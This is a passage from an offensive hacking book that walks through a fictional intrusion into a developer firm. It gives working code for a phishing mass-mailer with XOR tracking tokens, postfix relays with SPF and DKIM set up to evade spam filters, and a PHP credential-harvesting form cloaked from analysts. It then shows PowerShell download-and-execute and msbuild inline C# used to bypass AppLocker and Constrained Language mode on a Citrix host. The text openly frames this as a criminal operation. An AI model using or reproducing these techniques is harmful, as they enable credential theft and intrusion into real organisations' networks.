the stager or performed afterwards), such as changing registry keys,
installing services, setting up WMI event37... in short, far too many noisy
actions for a first dive into an unknown foreign environment.

Sometimes dropping a payload is of course the only way in, and thus
great care must be taken when deciding which persistence technique to
use, but if we look back at the reconnaissance performed earlier, we do
have a viable alternative that takes a more indirect approach and gives
us full autonomy over the target’s machines: the Extranet website.

Funny enough, I was talking with engineers from a leading antivirus company
one time about this same issue: in-memory execution. I pointed out that their new
upgrade still failed to address this problem. Their response was wide glaring eyes
and an aggressive “but, nobody does that!”. False—and in any case, you should.
37We used this technique in How to Hack Like a GOD, but if you want the full
paper, check out
Strat Jumbo’s extranet service, which is located at, allows some developers to connect to
internal machines, deploy code and review changes from virtually
anywhere in the world. It is one of their selling features for young nomad

As you can see, we only need a valid pair of credentials

(username/password) to get in. Phishing and passwords—a match made
in heaven!

A recap of our full hacking scenario—not factoring in major

surprises— would go something like this:

• Collect Strat Jumbo credentials via phishing

• Connect to the extranet website and take control of our first
• Bounce on the internal network and locate Strat Accounting’s
source code
• Add a backdoor that only gets triggered on G&S Trust workstations
• Wait patiently for a reverse shell
• Move inside the network, then locate and retrieve sensitive data

Now that we have a fully working, albeit theoretical, scenario, let’s get
right into it. Forget about msfvenom, Veil-evasion38 and other classic
malware building tools. We will focus instead on building a decent
credential-grabbing form and a nice phishing platform that bypasses most
modern spam filters.

Perfecting the hook
If we cannot register a new domain for fear of having it flagged as
suspicious by spam filters, how can we acquire one? The solution is
simple enough; we register an old domain on,
selecting one, for instance, that had been registered years ago but
recently expired.

There is a delicate balance to achieve here. We want a website with

an existing e-reputation and history, but at the same time, it must bear a
certain relationship to Strat Jumbo in case people look too closely at the
source email address: is definitely a good candidate, but it has zero back-

links so we will instead use it to host the fake corporate website with the
phishing page., on the other hand, is just right; it has ten back-

links (six from different domains), a name that looks like a legit spin-off,
been out there since 2011, and is not blacklisted by most popular lists
(check or

Had we opted for a malware delivery through HTTPs, then we would

need to take another dimension into account as well: domain

That way, even if SSL interception is active, we can attempt to bypass

it by choosing a domain belonging to a sensitive category that is usually
exempt—by law, in most countries—from interception (banking, medical,
Domain category is by no means a standard concept and depends
heavily on the web proxy used by the company. However, by choosing
domains with obvious keywords and a high number of back-links, it is easy
to reach consensus:, an expired domain, is ranked as a health

website in both the McAfee ( and Symantec/Bluecoat
( databases, which improves our chances of
bypassing SSL interception. Again, this is not a foolproof method, but it
heavily stacks the odds in our favor39.

We get back to our original two domains (for

email delivery) and (for hosting the fake website). Of
all the sellers listed under, only Namecheap accepts
Bitcoin payment, so that settles it fairly quickly40.

On the Namecheap dashboard, we configure these two domains to

point to the same public IP address, that of the phishing public relay:

We have the domain’s reputation quite covered. What else should we

worry about?

39 Interesting script to automate the categorization checks across several proxies:
40 Of course, when virtual card sellers settle their issues, we will once again have

the luxury of choice should we prefer another registrar.

An email’s reputation is assessed by looking at two more components:
its headers and body. Headers contain metadata describing the sender
and recipient’s email addresses, intermediary relays, email signature and
so forth. The body contains the email’s message.

A good start is to test our email’s template against SpamAssassin’s

rules41, which is a famous open-source project by the Apache foundation
that was—like most open-source projects—ripped off by many
commercial spam filters and will thus be the perfect training wheel.

Protonmail (an email service) uses SpamAssassin combined with

commercial blacklists to flag spam emails. The neat thing about it is that
SpamAssassin appends headers to an email detailing various checks and
tests it applied, as well as the global score attributed to an email.

By checking these headers in Protonmail, we can fine-tune our

phishing email based on a real-life corporate spam policy. Take this spam
email, for example, with a mediocre score of 23.7:

That’s a lot of acronyms. Let’s dive in and explain a couple of the main
tests and rules applied to email headers—which are specific to Spam
Assassin—but whose principles hold for other spam filters as well.

• SPF=none refers to the absence of sender policy framework

(SPF). SPF is a DNS record describing which servers are
authorized to send emails on behalf of a given domain name. We
therefore need to set up a TXT DNS record on Namecheap that
explicitly authorizes our phishing public relay to send emails on
behalf of

• DKIM=none refers to the absence of a signature that guarantees

the email’s integrity. Thus, we need to generate and store a public
key in a TXT DNS record on Namecheap, but also configure our
email server to automatically sign all outgoing emails.

different “from” fields in an email. The “SMTP FROM” field and the
“FROM” field, both of which need to point to the same domain
name. This usually is not a problem unless we rely on an email
service provider like Mailchimp or Amazon SES.

• RCVD_IN_IVMSIP indicates that the IP address is blacklisted by

commercial spam lists.

These are the most significant checks related to email headers that we
need to nail down before launching the phishing campaign.


If you decide to use an email sending platform like MailChimp or Amazon

SES, you could get a point-click interface to set up all the options
discussed, but where is the fun in that?

We install postfix, the email server, on both the public relay and the
phishing backend:

root@Phishing:~# apt-get install postfix

root@Phishing:~# service postfix restart

root@PhishingRelay:~# apt-get install postfix

root@PhishingRelay:~# service postfix restart

The installation process is quite intuitive, but if you are doubtful, you
can always follow one of the many guides available on the internet

All emails will be sent from our phishing server but it will be necessary
that they go through the postfix on the phishing relay to mask our first IP
address, which is in line with the concept of resiliency.

If Strat Jumbo blocks our public relay IP address, we only need to

redirect our traffic through another postfix relay and we are good.

We need to tune up a couple of settings on the postfix email server

installed on the relay server (file /etc/postfix/

• Encryption: instruct postfix to establish TLS connections with

recipient email servers when possible. (Gmail flags emails that do
not use encryption, for instance.)
• Setup the hostname to
• Allow the phishing server to use this postfix instance as a relay.

# Public phishing relay or redirector

myhostname =
mynetworks = <Outgoing_IP_Phishing_Server>
inet_interfaces = all

Correspondingly, on the backend phishing postfix, we design our

public redirector as an email relay server and force encryption as well:

# Phishing server

relayhost =

We can send a quick test email to our own inbox to ensure the service
is set up properly. The email’s headers should only display the relay’s IP

root@PhishingRelay:~# service postfix restart

root@Phishing:~# service postfix restart

root@Phishing:~# echo "This is the body of the email" | mail -s
"This is the subject line" [email protected]

Setting up the SPF is surprisingly straightforward. We just need to add

a new TXT DNS record on Namecheap, which authorizes our public relay
(ip4: to send emails on behalf of the
domain. All other senders should fail the SPF test (-all).

v=spf1 ip4: -all

42If you would like to remove the internal IP address as well, follow this simple
guide. It does not really matter since we are using a redirector anyway, but maybe
you will find it useful for another case:
Setting up DKIM, on the other hand, requires a bit more configuration.

On the phishing server, we install OpenDKIM, the open-source

implementation of DKIM signing, which acts as a sort of filter on the
phishing server. It intercepts all postfix outgoing emails, signs the body,
then forwards them to their destination:

root@Phishing:~# sudo apt-get install opendkim opendkim-tools

We replace the content of the configuration file /etc/opendkim.conf

with the following lines that detail the domain name to be signed and the
location of the private key (which we will create in a bit):

# On the Phishing server (/etc/opendkim.conf)

KeyFile /etc/opendkim/mail.private
Selector mail

We proceed with setting up the port on which OpenDKIM intercepts

outgoing emails to sign by updating the file /etc/default/opendkim

# On the Phishing server (/etc/default/opendkim)

# Make sure to comment the local socket file



We then instruct postfix to relay all outgoing emails to the DKIM

daemon by specifying the socket port number used by OpenDKIM (12301
per our configuration file) in /etc/postfix/

# On the Phishing server (/etc/postfix/

milter_protocol = 2
milter_default_action = accept
smtpd_milters = inet:localhost:12301
non_smtpd_milters = inet:localhost:12301

Finally, we move to the /etc/opendkim/keys directory, which is where

we generate and store the domain’s private key:
root@Phishing:~# cd /etc/opendkim/
root@Phishing:~# opendkim-genkey -s mail -d
root@Phishing:~# chown opendkim:opendkim mail.private

These commands create a pair of public (mail.txt) and private

(mail.private) keys, for which we restrict access to only the OpenDKIM

The public key (mail.txt) is published in a TXT DNS record that we set
up using Namecheap.

Once this setup is done, we restart OpenDKIM and Postfix:

root@Phishing:~# service postfix restart

root@Phishing:~# service opendkim restart

We can check the final configuration of our email server by sending a

test mail to almost any email service (Gmail, Protonmail, Yahoo, Yandex,
etc.) and view the email headers43:

Perfect! As displayed by SpamAssassin, our low score indicates that

our email server is fairly well set up to start a clean phishing campaign 44!

Now we’ll move onto the actual content of the email. Since we mainly
picked a list of programmers, we must choose a subject that they will
potentially feel passionate about. Something that will grab their attention
because they feel emotionally engaged with it for a brief minute, but
completely forget about the moment they close the website.

43 A very handy tool to verify SPF and DKIM configuration is
44 We could optionally set up ADSP and DMARC, which respectfully enforces
DKIM signing and notifies us when someone is forging an email address related
to our domain (e.g., when SPF verification fails), but it does not bear too much
weight on an email’s score.
How about a new plugin developed by the Australian team (since we
will be hosting the fake website on the domain which bears
resemblance to that is being made available for other offices in
a sort of beta version.

We do not have to go too much into the specifics, simply ask for their
feedback. We pick a real developer’s name from LinkedIn to further push
the vicious web of deceit:

As some of you probably know, our teams in Australia have been working
on an exciting new plugin for our favorite IDE.

Today we would like to share a beta version of this plugin with your offices,
so feel free to give it a spin and give us your feedback: Hero plugin

Kind regards,
Michael Han
Senior programmer
T +61 02 9912 3981


As you can see, the text is to the point, does not over punctuate, nor
does it contain hidden links and uppercase text to urge users to click on
a link.

All these signs are heavily flagged by any decent spam filter anyway.
Rather, it casually invites programmers to click on the link and download
the plugin using simple and logical language.

The image code in the signature does more than display the
company’s logo and reassure users about its genuine origin. It also
allows us to track how many people opened the message since every
user viewing the message will fetch the image from our phishing server
(through the public relay).

The HTML code inserting the image simply reads as follows:

<img src=""
alt="strat jumbo logo" />

The link to the plugin included in the email contains a unique tag per
email to track targets once they get redirected to our phishing page:

This seemingly random blob of data in the utm_term parameter is the

target’s encrypted name. The idea is that when the user gets redirected
to our phishing page, they get a custom greeting like “Welcome Steve”
that fools them into thinking that the website somehow has access to their
identity through the regular corporate SSO.

To derive this token from the username, we apply a simple XOR

operation in python to the full name before sending the email:

from itertools import izip, cycle

import base64

def xor_string(data):
key ="PibtwweIOwI8S6VEbADlRHpm4w4L6"
xored = ''.join(chr(ord(x)^ord(y)) for (x,y) in izip(data,

return base64.encodestring(xored).strip()

Getting valid employee names is the easy part, and we will eventually
deal with this later. For now, let’s just suppose that we have gathered
such a list.

We need a quick and dirty script to loop through it, build the
customized link by calling the xor_string function, include it in the email
and send it through the local postfix server. The following code is heavily
commented and fairly straightforward so feel free to dive into it:


import smtplib
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from itertools import izip, cycle
import base64
import time

#include previous xor_string function

with open('list_names.txt', 'r') as f:
for line in f:
# retrieve the full target name (e.g., david.stuart)
target = line.strip()
# Create message container - the correct MIME type is
msg = MIMEMultipart('alternative')
msg['Subject'] = "Link"
msg['From'] = '"DEV Strat Jumbo"
<[email protected]>'

# Append the target name to the email address

msg['To'] = target+""

# Build the utm_term encrypted blob

xor_data = xor_string(target)

# Create the body of the email

html = """\
<a href='....?utm_term="""+xor_data+"""'></a>
# The HTML message is included in the email container
part2 = MIMEText(html, 'html')

# Send the message via local SMTP server.

s = smtplib.SMTP('localhost')
s.sendmail(msg['From'], msg['To'], msg.as_string())
# sleep 2 seconds

We make a few test runs on Gmail and Outlook addresses to make

sure we pass their spam filters.

If you have trouble landing in the inbox folder, it means that either the
domain name was poorly chosen or the email’s wording was deemed
suspicious. Phrases like free, click here, big opportunity and similar will
skyrocket the spam scoring.


Never forget to register the source email address you are using
([email protected] in this case). It is as simple as
declaring an email forwarding setting in your DNS provider to a legit
mailbox (,, yopmail, etc.).

It is simply a waste to go to all this trouble only to be busted because

users who cared enough to reply got an error stating that the email
address was not registered.

Next we’ll focus on setting up the website where these people will
entrust us with their credentials.

As previously stated, we want to design a legit-looking website around

programming that will fool most nosy forensic analysts. Only one hidden
page will contain the password-grabbing form that tricks users into giving
away their passwords.

We set up a Wordpress website45 with a basic theme that is heavily

inspired by Strat Jumbo’s color chart. The quickest and easiest way to
achieve a high level of accuracy is to suck in one of Strat Jumbo’s
websites using the HTTP Tracker tool—but be prepared to sustain a few
broken links and missing images.

I tend to follow a more manual approach. After all, no two websites

resemble each other exactly, so it is generally fine to take some liberties
here and there.

That said, there are some key variables that absolutely must remain
constant because they speak directly to the unconscious part of the brain.
These are consistency in the color chart, font family, conversation tone,
letter spacing, line thickness and the company’s logo.

If we get these straight, we will fool most users into thinking they are
on a trusted corporate website.

We shall present our fake website as a marketing blog used by

management to share the latest beta plugins, communicate on IDE
features, and boost Strat Jumbo’s image.

When you think about it, no single employee really knows every single
one of their corporate websites. Hell, even IT admins have a hard time
keeping up with corporate websites popping in and out of existence due
to marketing and communication initiatives.

To make it even more credible, we fill our website with different articles
about programming that we pick up here and there and sign them with a
legit employee names gathered from LinkedIn:

45 If you need help setting up a Wordpress website, follow this step-by-step guide:
In the midst of this charade, we add a single hidden page that
announces a new plugin and invites users to authenticate using their
corporate credentials to download said plugin. Nothing too fancy mind
you, the bulk of persuasion was already carried out by the email and
website’s templates.

As discussed previously, our custom message on the top right will be

the small nudge needed to push them over the cliff:

The back-end code is a simple form grabber that writes credentials to

a flat text file and displays an error message stating that the plugin will
be available shortly46:

// If login and password parameters exist and are not empty

if (isset($_POST['login']) and $_POST['password']
and !empty($_POST['login'])
and !empty($_POST['password'])){

// Display error message then write credentials to a file

echo "The plugin will be available in a couple of days in
your region, please come back soon!";

$data = $_POST['login']."\t".$_POST['password']."\n";

file_put_contents('/tmp/results.txt', $data, FILE_APPEND);

46 Use the plugin insert_php to write code in Wordpress posts and pages.

While this setup will certainly do the job, all it takes is one suspicious
programmer to forward the email to her analyst friend and the whole
campaign is doomed.

To combat this, we will add a small diversion—a bootstrap code that

follows a basic logic to decide whether or not to display the phishing page.

Each user, by design, gets a unique URL to our secret page thanks to
the name incorporated in the utm_term parameter.

Therefore, we can assume that, in most successful cases where users

follow their first impulse, the URL will only be viewed once. We can then
translate this assumption in the code and automatically change the
page’s content if the same URL is viewed more than once—by a nosy
analyst that was forwarded the email by a suspicious user, for instance.

Sure, this little stratagem reduces the likelihood of getting credentials

since a user that misses the opportunity to enter their password
information the first time will no longer access the page, but it is worth the
small loss.

To achieve this stratagem, we first create an SQL table with four

columns: a row ID, the utm_term token’s value which is the encrypted
target name, a counter, and the browsing date.

Each time a user loads the page, we increment the counter field tied
to their unique utm_term parameter. With this in place, it is simply a
matter of checking whether the user previously visited the page (counter
superior to zero) or not (counter equals zero):

root@Phishing:~# mysql -u root -p

mysql> CREATE TABLE tokens (

utmterm VARCHAR(100) NOT NULL,
counter smallint,
reg_date datetime

mysql> INSERT into tokens values(null, "FAgUHRNXNj06FjtM", 0,


mysql> INSERT into tokens values(null, "AwgQFR9XITw7AyBdIQ==", 0,


Next, we write the bootstrap PHP code that, upon loading the page,
checks the database to see which course of action to follow. If the page
has already been visited (counter > 0), it loads dummy content of exactly
the same length as the password-grabbing form. If not, it serves the
actual phishing page.

//If no utm_term token or if it’s empty, redirect to main page

if (!isset($_GET['utm_term'])
or empty($_GET['utm_term'])){
header('Location: /');

//Mysql connection
$db = new
'wp_user', 'Kja98&o:Lkaz098');

//Fetch the count field from the database tied to the specified
utm_term parameter
$stmt = $db->prepare("SELECT * FROM tokens WHERE
$stmt->execute(array(":utmterm"=> $_GET['utm_term']));

//If page viewed first time display earlier form

if ($row = $stmt->fetch(PDO::FETCH_ASSOC)
and $row['counter'] == 0) {


//Increment the counter since the page was displayed

$stmt2 = $db->prepare("UPDATE tokens set counter = 1,
reg_date=NOW() WHERE utmterm=:utmterm");

$res = $stmt2->execute(array(":utmterm"=> $_GET['utm_term']));

//If no matching token is found, then it was tampered with

} else if (!$row){
header('Location: /');

//If the user visits second time, show the usual error with
} else {

echo "The plugin will be available in a couple of days in

your region, please come back soon!";
// Pad with additional invisible data to achieve same length
as the form.
I avoid using redirections unless users explicitly tamper with
parameters. An analyst looking at proxy data could potentially spot the
discrepancy between users successfully loading the page the first time
(HTTP code 200) and those same users failing to revisit it again (HTTP
code 302).

They could then infer that some sort of filtering mechanism exists at
the server side and thus get incentive to probe further.

Once a user enters their credentials, the webserver writes them to a

file and rewards them with an error stating that the plugin will soon be
available in their region.

Great! Now we just need a list of targets to send this baby to, then we
sit back to enjoy the influx of passwords.

Thanks to our quick exchanges with the business department, we

know that Strat Jumbo uses the following email format
[email protected], so we can rely on LinkedIn to find
reliable emails of current employees.

Another way would be to search Google for occurrences of

“”. Or even better, since we are dealing with a big
corporation, search through lists of previously leaked passwords and
check for email addresses belonging to Strat Jumbo. Sometimes we can
even find legit passwords to reuse on corporate platforms.

Once we gather a substantial list of valid email addresses (~200), we

choose a subset of that, say 120 to be our first test batch.

For all we know, our email may contain flagged keywords due to past
spam emails targeting Strat Jumbo. Or maybe they have a sophisticated
piece of monitoring device that we did not anticipate.

It would be imprudent to bet all our money on a single bold move

involving all the email addresses we’ve collected, so let’s take it steady
and slow.
We send the first batch of emails around 10 a.m. to greet users just
when they come back from their morning coffee break.

A second batch will depart around 12:30 p.m., when most people are
mindlessly biting into their daily sandwich and looking for a distraction.

root@Phishing:~# python list_emails.txt

We write a quick script to loop through the Apache log file

/var/log/apache2/access.log looking for requests to download that
image in the email’s signature. This command keeps track of the
campaign’s open rate:

root@Phishing:~# tail -f /var/log/apache2/access.log |grep


A first hit already! One in 120 is a pretty low score—but give it time!
Typically, 90% of all the potential hits will occur during the first eight

Anything less than a 5% open rate would strongly indicate that our
message was most likely caught by the spam filter. This is unlikely in this
case, though, given the reactivity of the first user and the myriad of tests
and configuration steps we took.

In any case, we come back a couple of hours later and lo and behold,
twenty-five users have already graced us with their passwords, and the
count keeps on increasing:

If that’s not one of the sexiest things ever, I don’t know what is...
First dive in
“Testing leads to failure, and failure leads to
Burt Rutan
Just twenty-four hours after the phishing campaign, we’ve already hit
thirty-five passwords. That’s thirty-five bullets in our belt to attack Strat
Jumbo by impersonating some of their most critical staff. Curiosity being
what it is, our phishing email probably even fooled a few tech-savvy sales
people and IT admins.

But we do not particularly care about them now, do we?

Time and time again, pentesters and red-teamers associate “pwning”

a company with getting Windows domain admin privileges. What a biased
and reductive way to model real-world threats.

It is true that once we achieve domain admin privileges, we have free

reign over all Windows systems, which easily accounts for 85% of the IT
infrastructure. Surely that’s why pentesters, constrained with limited time
and budget, automatically chase this holy grail. One finding to rule them
all. One vulnerability to illustrate infinite business risks.

The perfect response to an imperfect exercise.

We, however, are not pentesters. We do not have a time limit, nor a
duty to report findings and convince a reluctant board of executives.

If we can devise a way to plant a backdoor in Strat Accounting’s code

using a standard developer account, then all the better. It may well save
us time and leave a smaller footprint on systems.

Therefore, we need to keep in mind that anyone with write access to

the code is our direct target, whether they are IT support, code testers,
bug reporters, programmers and, of course, IT admins, through indirect

We know that most of our phishing victims are most likely

programmers thanks to our targeted email; however, we cannot be
certain of their involvement in the Strat Accounting project. Hopefully, we
will get a clearer idea once we are inside the corporate network.

Get ready for our first dive in.

Prison break
Through our FrontGun server (Virtual Private Server), which is
registered in London, we connect to the extranet application on using one of the random credentials at
our disposal. Let’s go for Laura’s, since she also happens to work in the

We are greeted with what looks like a Citrix platform offering to

execute one application only: Firefox.

A Citrix environment is one of the most common solutions favored by

big companies to grant external employees (or business partners) limited
access to internal resources: business applications, file shares and so

Programs published through Citrix are executed on one of the many

servers of the Citrix farm inside the corporate network, yet to the end
user, it seems that the program is really running on their own computer.
Think of it as a twisted remote desktop session (RDP) constrained to
a single application.

Below is a simplified diagram of a typical Citrix architecture to help

you picture the platform:

The Netscaler server is acting as a load balancer/reverse proxy to

distribute user connections to multiple Storefront servers. These
Storefront systems manage the delivery of applications and desktops to
end users.

This is where admins get to declare and define which applications

should be published, who can access them, which type of authentication
to perform, etc. These applications are not running on the StoreFront;
they are fetched through a sort of encapsulated RDP from remote
Windows servers (called XenApps).

Citrix also offers the possibility to run a fully interactive desktop

session, in which case the StoreFront channels a full RDP session with
a predefined set of Windows desktops.

Citrix is an intricate solution with many internal modules (databases,

network shares, etc.). Hopefully, this one-dimensional image helps you
picture the general workings of the platform.

Sometimes we do not need to fully understand a system to hack it,

but it is always better to have a good grasp of the big picture to know
what we are dealing with.

For all its fancy graphics and sexy concepts of containment, Citrix, at
the end of the day, is nothing but a mirage. An illusion devised to deceive
the most gullible admins that readily believe it to be a security product.
The truth is that there is no containment enforced.
Any user that runs a program published through Citrix can escape the
visual constraints placed on the application and access the remote
server’s full resources: Windows Explorer, task manager, command line
interpreter, and basically every other resource, even though these were
not originally published on the StoreFront.

There are a number of articles that discuss the bypassing of visual

restrictions on Citrix (, which we will not necessarily
explore in great depth right now since we have already covered a few of
them in How to Hack Like a GOD.

We start with a basic hot-key to launch the task manager on the

XenApp server. We fire up Firefox in Citrix and press “Ctrl + F1”. If
successful, the task manager would then allow us to pop a command line
interpreter on the XenApp server.

Not surprisingly, this throws out an error. That would have been too
easy, of course. Strat Jumbo seems to have raised the bar a little.
Probably aware of Citrix’s limitations, they have activated Microsoft’s
whitelisting solution, Applocker.

It allows admins to block executables deemed “dangerous”.

TaskManager is an obvious candidate, but thankfully we can find another
way around it.

Back to the Firefox window, we press “Ctrl+O”, this time to launch the
“open dialog box”. We cannot access the main C: drive nor its share
counterpart (\\C$). They are both blocked by Windows GPO

47Group Policy Objects are a set of rules and settings applied at the domain level
to a subset of users and/or workstations. These rules can span a wide array of
configuration elements on Windows (password complexity, lockout time, etc.)
Funny enough, though, we can bypass this silly restriction by directly
browsing the file system through Firefox... ah, Windows!

We cannot write to these folders using the “save as” dialog box since
they are subject to the “File Explorer” GPO settings, but this simple read
access allows us to browse the hard drive looking for low-hanging fruits
like personal folders, passwords in clear text, forgotten configuration files
in temp folder, etc. Unluckily for us, nothing useful really stands out.

Continuing our battle against Applocker, we try spawning several

programs from the address bar of the “open dialog box”:
We try the usual suspects: cmd.exe, explorer.exe, notepad.exe,
WMIC, Office Suite, CScript, JScript, rundll32, mshta, etc.48. All of them
are blocked, except for our good friend PowerShell.exe:

Can it be any easier, right?

Users opening a Windows session on the XenApp server are

assigned a home folder on a common network share. This home folder
is usually mapped to a local drive letter, hence the drive “X:\” in the figure

We try some benign reconnaissance commands on this STRAT-CI-

01 server to get a quick overview of the environment we are connected

PS X:\> ipconfig
Windows IP Configuration
Connection-specific DNS Suffix : stratjumbo.lan
IPv4 Address. . . . . . . . . . . :
Subnet Mask . . . . . . . . . . . :

PS X:\> systeminfo
Host Name: STRAT-CI-01
OS Name: Microsoft Windows Server 2016 Datacenter
OS Version: 10.0.14393 N/A Build 14393
Domain: stratjumbo.lan
Hotfix(s): 4 Hotfix(s) Installed.
[01]: KB3186568
[02]: KB3192137
[03]: KB4049065
[04]: KB4077525

48Great resource that summarizes all these bypass techniques with detailed
49 The limitation to access the C: drive does not apply to the PowerShell session
any more than it did to Firefox session, except that this time we can freely write
to folders, as long it is allowed by access control permissions.
We are dealing with the latest version (as of February 2018) of
Windows Server 2016, build number 14393. It is sitting in the sub network, probably in a DMZ away from the internal

The system was recently patched, which is evident by the KB

number50 (the KB4077525 package was issued end of February 2018)
so we can forget about newly released exploits to elevate privileges.

PS X:\> net localgroup "administrators"

STRATJUMBO\Domain Admins

The domain account “Citrix_sv” has admin privileges on this machine.

It may also hold the same privileges on other servers of the XenApp
servers of the Citrix farm. This is a valuable account to lay our hands on.

PS X:\> net group "domain admins" /domain


admin.beny admin.ho admin.stanley
admin.edward admin.flavien admin.bill
admin.mehdi admin.penny admin.nastya
admin.jed admin.chan admin.ken
admin.shwartz admin.klauss admin.silberto

Strat Jumbo’s Windows domain seems to be managed by thirty highly

privileged accounts. We cross-check with the list of accounts we retrieved
via phishing earlier, but luck fails to be on our side this time. Nevertheless,
we should keep an eye out for these accounts if we ever stumble on one
of them.

In any case, it is time for a full domain reconnaissance using more
appropriate tools, like the infamous PowerView script51. We want to
gather real intelligence on Strat Jumbo’s environment, including
information on their user accounts, group membership, trust
relationships, etc.

We opt for a classic in-memory execution using DownloadString and

Invoke-Expression to avoid potential antivirus solutions:

# Create a browser object

$browser = New-Object System.Net.WebClient;

# Add support for the default proxy with cached user credentials

# Download and execute the PowerView script in memory


That’s disappointing to say the least. Maybe PowerShell was

carelessly ignored by Citrix admins, but Applocker’s script rules made
sure to lock it down using the Constrained Language mode.


Constrained Language mode ( limits PowerShell

to a restricted subset of approved and harmless features. The New-
Object command is certainly not one of them since it defines custom
.NET or COM objects that extend PowerShell’s reach to interact with
Windows’ internal components, hence the previous error

This mode also forbids some advanced features like calling .NET
methods, defining new classes from native C# code (add-type function),
starting jobs (start-job), and so on.

Most of the offensive PowerShell scripts on the market are thus

rendered almost useless by this new security setting in the PowerShell
execution engine called Windows Management Framework, a.k.a. WMF

The easiest way to bypass this restricted environment is to call the

default PowerShell v2 interpreter which does not implement any of the
new security features of version 5.

Out of luck again. The version 2 of the .NET framework is not installed
on this server.

We could avoid using PowerShell altogether, but it’s not like we have
a lot of options here. The Applocker policy deployed on this server even
covers DLLs. Only files from trusted locations can be loaded by any given

PS X:\> import-module applocker

PS X:\> $a = Get-AppLockerPolicy -effective
PS X:\> $a.rulecollections

It seems we need to bring out the big guns to escape this deadly
combination of Applocker and Constrained environment.

As you may know, PowerShell.exe and most other complex

executable files for that matter are simply wrappers around single or
multiple DLLs that implement the true logic of the program.

All core features available in PowerShell, for instance, are defined and
exported by the System.Management.Automation.dll file.
While PowerShell.exe is forced into Constrained mode when
Applocker activates, System.Management.Automation.dll is not. It
continues to operate in Full Language mode, oblivious to Applocker’s

If we care to build our own wrapper that calls and initiates

System.Management.Automation.dll, we’ll get to enjoy the full power of
PowerShell commands once again.

This wrapper cannot be an external executable file (.exe or .dll) that

we build separately then drop in the Citrix environment. After all, thanks
to Applocker, files are only allowed to be executed from a couple of well-
defined folders (C:\Windows and C:\Programs, in this case), over which
we have no write privileges.

Since everything is so tightly locked down, one could wonder: “what

is really allowed on this machine?” The answer is: trusted binaries!

Enter Casey Smith (@subtee). His many tips and tricks for abusing
trusted Windows binaries made him somewhat of a godly figure and
trusted reference in the security community.

His is a name that is nowadays synonymous with bypassing

whitelisting solutions. He has demonstrated all sorts of ways of abusing
trusted Windows binaries, from simple tricks like using certutil.exe (tool
to display certificates) to download files to more advanced techniques like
executing shellcode/malware using the native regsvcs tool

One such powerful trick to help us in our current predicament is

msbuild, the engine platform that compiles and runs .NET applications.

Msbuild is a Microsoft signed binary that is located in a trusted

directory depending on the .NET framework version (e.g., on version 4
the path is

Applocker therefore allows it to run in its default rules. Moreover,

msbuild is regularly used by developers for its scripting capabilities,
allowing flexibility when compiling and building multiple projects (unlike
the heavier Visual Studio, for example).

It is highly unlikely that admins block this particular executable file

across their servers, especially at Strat Jumbo—a developer’s firm.
Indeed, we can freely run this utility from the open dialog box (though
it will quickly disappear since it terminates with an error if no correct input
file is provided):

All we need now is a project in the form of an XML file that contains
the code to be compiled. If successful, msbuild will automatically load and
run the executable file, thus bypassing Applocker rules.

While we usually refrain from dropping files on disk to keep our

footprint to a minimum and avoid any pesky antivirus solution, it seems
that we do not really have a choice this time. On the bright side, however,
this should not be much of a problem since we will manually craft our
payload, thus avoiding obvious malicious strings of code.

On one of our hacking servers, we start writing an empty project file

called readme.txt, following the Visual Studio 2017 documentation

<Project ToolsVersion="4.0"


A project element usually incorporates a target node (<target>). This

node is the root element aggregating the succession of tasks to be
executed by msbuild. These tasks can be built-in operations like MakeDir
to create directories, Copy to copy files, etc.

However, since we are shooting for something a tad more

complicated—compiling and running code on the fly—we need to create
our own custom task by defining a new XML element, like PsCommand,
for instance.

<Project ToolsVersion="4.0"

<Target Name="PSBYPASS">

PsCommand is the name of the custom task to be compiled and

executed by msbuild. We define it a few lines into the project, inside the
UsingTask element:

<Project ToolsVersion="4.0"

<Target Name="PSBYPASS">
osoft.Build.Tasks.v4.0.dll" >


The TaskName attribute of UsingTask must correspond to the

element’s name in the Target node: PsCommand. The AssemblyFile
attribute points to the DLL containing basic commands to translate our
future code (C#) into msbuild native tasks to be executed.

Inside the UsingTask element, we define the Task node (<task>) that
contains the Code element (<code>), where—surprise, surprise—we
can write C# code and call .NET functions.

<Project ToolsVersion="4.0"

<Target Name="PSBYPASS">
osoft.Build.Tasks.v4.0.dll" >
<Reference Include="System.Management.Automation" />

<Code Type="Class" Language="cs">

// Write C# code in here!

As stated previously, we need to include a reference to the

System.Management.Automation DLL to be able to call PowerShell
commands, hence the Reference element above.

I will paste the C# code below in a standalone figure for better clarity,
but it is to be included in the above XML file, inside the Code element

First, we start by defining a public class called PsCommand that

inherits the ITask and Task interfaces required by msbuild:

// Import all the necessary DLLs

using System;
using Microsoft.Build.Framework;
using Microsoft.Build.Utilities;
using System.Management.Automation;
using System.Management.Automation.Host;
using System.Management.Automation.Runspaces;
using PowerShell = System.Management.Automation.PowerShell;

//main public class implementing Task and ITask interfaces

required by msbuild
public class PsCommand : Task, ITask

Inside this class we override the Execute function, which is where

msbuild starts the execution thread:

// Import all the necessary DLLs

using System;
using Microsoft.Build.Framework;
using Microsoft.Build.Utilities;
using System.Management.Automation;
using System.Management.Automation.Host;
using System.Management.Automation.Runspaces;
using PowerShell = System.Management.Automation.PowerShell;

public class PsCommand : Task, ITask

//Override the Execute method inherited from the Task interface.
The execution thread starts here
public override bool Execute() {
//Output greeting
Console.WriteLine("Executing PS commands");

Console.WriteLine("Press any key to exit...");


//End of the Execute method

return true;

Now comes the meat of the code—the part where we initiate a

PowerShell pipeline, push commands down this pipeline and loop
through the resulting output strings:

// Import all the necessary DLLs

using System;
using Microsoft.Build.Framework;
using Microsoft.Build.Utilities;
using System.Management.Automation;
using System.Management.Automation.Host;
using System.Management.Automation.Runspaces;
using PowerShell = System.Management.Automation.PowerShell;

public class PsCommand : Task, ITask


public override bool Execute() {

Console.WriteLine("Executing PS commands");

//Creating a PowerShell pipeline. Equivalent to (command1

| command2 | ...)
PowerShell Ps_instance = PowerShell.Create();

//Chaining commands in the pipeline

//We start with a simple command to display which
environment we are running in


//Invoking the pipeline and fetching output strings

foreach (string str in Ps_instance.Invoke<string>())
//End o f loop
Console.WriteLine("Press any key to exit...");

//End of the Execute method

return true;

Still with me? Good. I put the complete code on Github, just in case
you need to download and experiment with it ( This is
the best way to fully internalize the concepts we are discussing.

Compiling and running this project file containing both the XML
structure and the C# code in our lab system is as straightforward as:


Microsoft (R) Build Engine version 4.7.2053.0

[Microsoft .NET Framework, version 4.0.30319.42000]
Copyright (C) Microsoft Corporation. All rights reserved.

